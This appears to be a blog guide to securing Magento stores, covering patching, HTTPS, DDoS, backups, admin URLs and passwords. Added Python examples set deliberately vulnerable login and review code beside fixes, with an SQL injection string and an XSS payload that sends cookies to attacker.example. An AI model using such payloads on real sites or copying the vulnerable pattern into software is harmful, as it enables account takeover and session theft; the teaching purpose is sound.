
How to keep your eCommerce site secure


We live in a world where data breaches can occur at any time, with poor eCommerce security often resulting in the theft and dissemination of highly sensitive information such as customer passwords and credit card details.

When this happens, it not only puts the customer at risk but also the hard-earned reputation of the eCommerce store involved in the breach. There can also be legal and contractual ramifications if investigations reveal that the breach was caused by negligence, such as failing to meet the PCI DSS requirements that apply to any site that handles card data.

In this article, we’ll take a close look at some of the more common risks to eCommerce website security on Magento powered sites, as well as the practical steps you can take to protect yourself from cybercrime.

Upgrade your software to the latest versions

Magento may be one of the most secure eCommerce platforms available, but if it’s not kept up to date, it can become vulnerable to attack.

One of the most common ways for hackers to gain access to a website is by taking advantage of well-known vulnerabilities in the platform or in third-party extensions. All the hacker needs to do is scan the internet for sites running a vulnerable version using off-the-shelf tools; the Magento version and the installed extensions are easy to fingerprint from the pages a store serves. Once a target website is found, it’s just a matter of running the published exploit against it.

Another common security problem in eCommerce is Cross-Site Scripting (XSS). This involves getting malicious script into one of the pages on a website, for example through an unescaped product review or search parameter, so that it runs in the browser of any visitor unlucky enough to be viewing that page. The script runs inside that visitor’s session on your site, so it can steal session cookies, capture card details or passwords as they are typed into a checkout or login form, or redirect the visitor to a phishing page. It does not give the hacker the visitor’s files, but it gives them everything the visitor does on your store.

SQL injection can be used to gain access to the database of the website, allowing the hacker to view, download, modify and delete information such as user accounts, payment details and password hashes. The hacker can even create an administrator account for themselves and take full control of the website. Both problems have the same root cause: untrusted input being pasted into a query or a page instead of being passed as a parameter or escaped on output.
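The two bugs above come from the same mistake, so here is a worked example of each beside its fix. This is added example code, not part of the original article and not Magento’s own code: it uses Python with an in-memory SQLite table, and the sample account, the injection string and the script payload are all constructed for the demonstration. The same pattern applies in PHP with PDO prepared statements and htmlspecialchars().

```python
import hashlib
import hmac
import html
import sqlite3

# Constructed payloads for the demonstration (not taken from any real incident).
SQLI_PAYLOAD = "admin@example.com' --"   # closes the quoted email, then comments out the password check
XSS_PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"


def password_hash(password: str) -> str:
    # Plain SHA-256 keeps the demo short; a real store uses a slow, salted password hash.
    return hashlib.sha256(password.encode()).hexdigest()


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for a store's customer table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)")
    conn.execute(
        "INSERT INTO customer (email, password_hash) VALUES (?, ?)",
        ("admin@example.com", password_hash("correct horse battery staple")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    """SQL injection: the query text is built from user input, so the input is parsed as SQL.
    With SQLI_PAYLOAD the '--' turns the whole password check into a comment."""
    sql = (f"SELECT id, email FROM customer WHERE email = '{email}' "
           f"AND password_hash = '{password_hash(password)}'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, email: str, password: str):
    """Parameterised lookup: the driver sends the email as data, never as SQL text.
    The hash comparison happens in code, with a constant-time compare."""
    row = conn.execute(
        "SELECT id, email, password_hash FROM customer WHERE email = ?", (email,)
    ).fetchone()
    if row is None or not hmac.compare_digest(row[2], password_hash(password)):
        return None
    return (row[0], row[1])


def render_review_vulnerable(author: str, body: str) -> str:
    """Stored XSS: customer-supplied text is placed into the page verbatim."""
    return f'<div class="review"><b>{author}</b><p>{body}</p></div>'


def render_review_safe(author: str, body: str) -> str:
    """Escape on output so the browser displays the text instead of executing it."""
    return f'<div class="review"><b>{html.escape(author)}</b><p>{html.escape(body)}</p></div>'


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable login with payload:", login_vulnerable(db, SQLI_PAYLOAD, "anything"))
    print("safe login with payload:      ", login_safe(db, SQLI_PAYLOAD, "anything"))
    print("safe login, real credentials: ", login_safe(db, "admin@example.com", "correct horse battery staple"))
    print(render_review_safe("Eve", XSS_PAYLOAD))
```

Run it and the vulnerable login returns the admin row for any password, while the parameterised version returns nothing for the same input; the escaped review shows the payload as text rather than loading it as a script.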

This is why it’s vital to keep your eCommerce website patched. Magento publishes security patches and advisories through the Magento Security Centre; on Magento 2 they are applied with Composer, and the same rule applies to every third-party extension you have installed. Magento also offers a free Security Scan Tool that checks your store for missing patches and known misconfigurations, so you can confirm that your eCommerce site is up to date.

Secure your eCommerce site with HTTPS

Websites that use HTTPS encrypt the traffic between the visitor’s browser and your server, so passwords and card details cannot be read or altered in transit. This makes them far more secure than their HTTP counterparts. As of July 2018, Google’s Chrome browser began marking HTTP sites as “Not Secure” to warn visitors that any information they share with the website would not be transmitted securely.

If your website is marked as not secure (this should be visible in the address bar of your browser), you need a TLS certificate, still commonly called an SSL certificate. You can purchase one from a provider such as GoDaddy and ask your host to switch you to HTTPS, or use a free certificate from Let’s Encrypt, which most hosts can install and renew automatically. Once the certificate is in place, redirect all HTTP requests to HTTPS, set Magento’s secure base URL and enable “Use Secure URLs on Storefront” and “Use Secure URLs in Admin” under Stores > Configuration > General > Web, and consider sending an HSTS header so browsers never fall back to plain HTTP.

Protect your website against DDoS attacks

A DDoS or “distributed denial of service” attack is a method used by hackers to knock websites offline by flooding them with traffic. Usually, these attacks originate from large networks of computers or internet-connected devices that are collectively referred to as a botnet. Typically, the owners of these devices have no idea that they are being used as part of an attack.

DDoS attacks can be difficult to combat because each device in the botnet has its own IP address, so there is no single source to block. Many botnets comprise tens or hundreds of thousands of infected machines, and some run to millions, so attempting to block them all yourself is impractical.

The best defence against a DDoS attack is to choose a hosting company, or a CDN and DDoS mitigation service in front of your store, with experience in absorbing them, because the flood has to be filtered upstream of your server. Should the worst happen, you can then be sure that you have an expert team working on getting your website back up and running again as quickly as possible.

Make regular backups

You should make daily backups of your eCommerce website, including the database and the media files. These backups should be stored away from your server, ideally in a separate cloud storage account with its own credentials, encrypted, and with write access limited to the backup job, so that an attacker who takes over the server cannot also delete or tamper with the backups. Test a restore periodically: a backup that has never been restored is untested. That way, if the worst happens and hackers destroy your site, you can get it back.

If possible, you should automate your backup process using an extension such as Magento Cloud Backup or something similar, or a scheduled job (cron) on the server. That way, you can be assured that a recent backup is always available even if you forget to make one yourself.
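An added example of what an automated backup job should do beyond copying files, written in Python for this article rather than taken from Magento or from any extension. It assumes a store root directory and a destination directory that you pass in, and that mysqldump is installed if you use the database dump helper; run_demo() exercises the rest against a constructed store tree in a temporary directory. The points it demonstrates are the ones the paragraph above calls for: a digest recorded beside each archive, a verification step that opens the archive, and a retention rule.

```python
import hashlib
import hmac
import subprocess
import tarfile
import tempfile
import time
from pathlib import Path
from typing import Optional


def dump_database(dump_path: Path, db_name: str, defaults_file: Path) -> None:
    """Dump the store database with mysqldump. Credentials come from a MySQL option file
    (--defaults-extra-file) rather than the command line, where `ps` would expose them.
    Assumes mysqldump is installed; not exercised by run_demo()."""
    with open(dump_path, "wb") as out:
        subprocess.run(
            ["mysqldump", f"--defaults-extra-file={defaults_file}", "--single-transaction", db_name],
            stdout=out, check=True,
        )


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def checksum_path(archive: Path) -> Path:
    return archive.with_name(archive.name.removesuffix(".tar.gz") + ".sha256")


def create_backup(store_root: Path, dest_dir: Path, db_dump: Optional[Path] = None,
                  stamp: Optional[str] = None) -> Path:
    """Archive the store files (and the database dump, if given) and record a SHA-256
    digest beside the archive so a restore can detect a truncated or altered copy."""
    stamp = stamp or time.strftime("%Y%m%d-%H%M%S")
    dest_dir.mkdir(parents=True, exist_ok=True)
    archive = dest_dir / f"store-{stamp}.tar.gz"
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(str(store_root), arcname="store")
        if db_dump is not None:
            tar.add(str(db_dump), arcname="db.sql")
    checksum_path(archive).write_text(f"{sha256_file(archive)}  {archive.name}\n")
    return archive


def verify_backup(archive: Path) -> bool:
    """A backup counts only once it has been checked: the digest matches and the archive opens."""
    recorded = checksum_path(archive).read_text().split()[0]
    if not hmac.compare_digest(recorded, sha256_file(archive)):
        return False
    try:
        with tarfile.open(archive, "r:gz") as tar:
            return "store" in tar.getnames()
    except tarfile.TarError:
        return False


def prune_backups(dest_dir: Path, keep: int) -> int:
    """Keep only the newest `keep` archives (timestamps sort lexically); return how many remain."""
    archives = sorted(dest_dir.glob("store-*.tar.gz"))
    for old in (archives[:-keep] if keep > 0 else archives):
        old.unlink()
        checksum_path(old).unlink(missing_ok=True)
    return len(list(dest_dir.glob("store-*.tar.gz")))


def run_demo() -> dict:
    """Constructed store tree in a temp dir: back up three times, verify, corrupt one copy,
    verify again, then apply a keep-two retention rule."""
    with tempfile.TemporaryDirectory() as tmp:
        store = Path(tmp) / "htdocs"
        (store / "app" / "etc").mkdir(parents=True)
        (store / "app" / "etc" / "env.php").write_text("<?php return ['db' => []];\n")
        (store / "pub").mkdir()
        (store / "pub" / "media.txt").write_text("constructed product image placeholder\n")
        dest = Path(tmp) / "backups"
        stamps = ["20240101-020000", "20240102-020000", "20240103-020000"]
        archives = [create_backup(store, dest, stamp=s) for s in stamps]
        verified_before = verify_backup(archives[-1])
        with open(archives[-1], "ab") as f:   # simulate a corrupted or truncated off-site copy
            f.write(b"\x00")
        verified_after_tamper = verify_backup(archives[-1])
        kept = prune_backups(dest, keep=2)
        return {"verified_before": verified_before,
                "verified_after_tamper": verified_after_tamper, "kept": kept}


if __name__ == "__main__":
    print(run_demo())
```

In a real job the archive and its .sha256 file are then copied to storage the web server cannot overwrite, and the restore test reads them back from there, not from the server’s local copy.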

Speak to your host about installing a firewall

Most reliable and secure eCommerce hosting providers will have a robust network firewall in place to block attempted hacks and mitigate the effect of DDoS attacks. You may also be able to have a web application firewall (WAF) placed in front of your store, which inspects HTTP requests and blocks common injection and scanning patterns, adding another layer of protection for your website.

Change the URL of your Magento backend

A Magento installation that keeps its default settings is easy for hackers to reconnoitre: Magento 1 serves its admin panel at /admin, and many Magento 2 stores are set up with a guessable admin path such as /admin too. To make matters worse, the most common administrator username is “admin”, which means that the only missing information left for a hacker running a password-guessing attack is your password.

To get around this, change your Magento admin URL. On Magento 2 you can do this from the command line with bin/magento setup:config:set --backend-frontname="your-new-path" followed by a cache flush; on either version it can also be set through Advanced > Admin > Admin Base URL in the configuration. You should also change your admin username to something less obvious, and restrict admin access to known IP addresses where your hosting allows it.

Improve your password policy

You should be using a long, unique password for your administrator account that isn’t used for any other websites or services. Length matters more than cleverness: aim for at least 12 characters containing a combination of uppercase, lowercase, numbers and special characters, and change it immediately if you suspect it has been exposed rather than waiting for a scheduled rotation. If you’re worried about forgetting this password, you can use a password manager such as LastPass or Bitwarden to store it.

You should also ensure that your users are following a similar approach by pre-configuring their password requirements via the Magento backend. If you are unsure how to do this, you can follow this excellent guide to setting up customer passwords.
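As an added example, not code from the original article or from Magento, here is a password policy check that goes slightly beyond what the admin configuration offers. Magento 2’s customer password options set a minimum length and a number of required character classes (the defaults are 8 and 3); this Python version adds a deny-list of common passwords and a check that the password does not contain the account’s email name. The deny-list below is constructed for the demonstration and should be replaced with a real breached-password list.

```python
import re
from typing import Callable, Dict, List, Optional, Set

# Constructed deny-list for the demo. In production, load a breached-password list
# (for example the offline Have I Been Pwned "Pwned Passwords" set) instead.
COMMON_PASSWORDS: Set[str] = {
    "password", "passw0rd", "password1", "123456", "12345678", "qwerty",
    "letmein", "welcome", "admin", "admin123", "magento", "iloveyou",
}

# The four classes Magento counts for "Number of Required Character Classes".
CHARACTER_CLASSES: Dict[str, Callable[[str], bool]] = {
    "lowercase": str.islower,
    "uppercase": str.isupper,
    "digit": str.isdigit,
    "special": lambda c: not c.isalnum() and not c.isspace(),
}


def character_classes(password: str) -> Set[str]:
    """Names of the character classes that appear at least once in the password."""
    return {name for name, test in CHARACTER_CLASSES.items() if any(test(c) for c in password)}


def check_password(password: str, min_length: int = 12, required_classes: int = 3,
                   email: Optional[str] = None,
                   deny_list: Set[str] = COMMON_PASSWORDS) -> List[str]:
    """Return the list of policy failures; an empty list means the password is acceptable."""
    failures: List[str] = []
    if len(password) < min_length:
        failures.append(f"shorter than {min_length} characters")
    found = character_classes(password)
    if len(found) < required_classes:
        failures.append(f"uses {len(found)} of {required_classes} required character classes")
    lowered = password.lower()
    # Strip the trailing "2024!" people append to a dictionary word before the deny-list check.
    core = re.sub(r"[^a-z]+$", "", lowered)
    if lowered in deny_list or core in deny_list:
        failures.append("is a common password (with trailing digits/symbols removed)")
    if email:
        local_part = email.split("@", 1)[0].lower()
        if len(local_part) >= 4 and local_part in lowered:
            failures.append("contains the account's email name")
    return failures


if __name__ == "__main__":
    for candidate, addr in [("Passw0rd!", None), ("correcthorsebatterystaple", None),
                            ("janedoe2024!!aaa", "janedoe@example.com"), ("xK9#mv2Lq!8pWz", None)]:
        print(repr(candidate), "->", check_password(candidate, email=addr) or "OK")
```

The function returns every failure rather than stopping at the first, which is what a registration form needs in order to tell the customer all of the reasons at once.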

You can also take your eCommerce security to the next level by introducing two-factor authentication for the admin. Magento 2.4 and later ship with two-factor authentication built in and enabled for admin users; on older versions you can add it using security extensions such as the aptly named Two Factor Authentication from XTENTO or the equally imaginatively titled Two Factor Authentication extension from Amasty. Both extensions offer a wealth of eCommerce security features to help make your website more robust.

Block countries that you don’t deliver to

It may sound like a harsh generalisation, but a large share of the automated attack traffic that stores see originates from networks in countries such as China. If you don’t ship products to a country, you can block all traffic from it at the country level using extensions such as IP Address and Country Blocker from FME extensions, or at the firewall or CDN in front of your store. Treat this as noise reduction rather than a security control: a dedicated hacker will simply use a VPN, a proxy or a compromised machine in a country you do serve, so it should block a great deal of unwanted traffic but must not replace patching and strong authentication.

Remember to stay vigilant at all times

This article has covered many of the technical methods that hackers use to gain access to your website, but often even the smartest among us can still fall victim to relatively simple human hacking techniques such as social engineering and CEO fraud, where an email that appears to come from the boss asks staff to change bank details or hand over credentials.

All of the above may sound like doom and gloom, but with the right knowledge, vigilance and common sense, you should be able to enjoy your time as an online seller without having to worry too much about hackers.

From everyone here at Form Commerce, we wish you all the best and hope you come back soon for more eCommerce tips.

Are you struggling with your website security?

Find out more about Form Commerce’s Magento development services.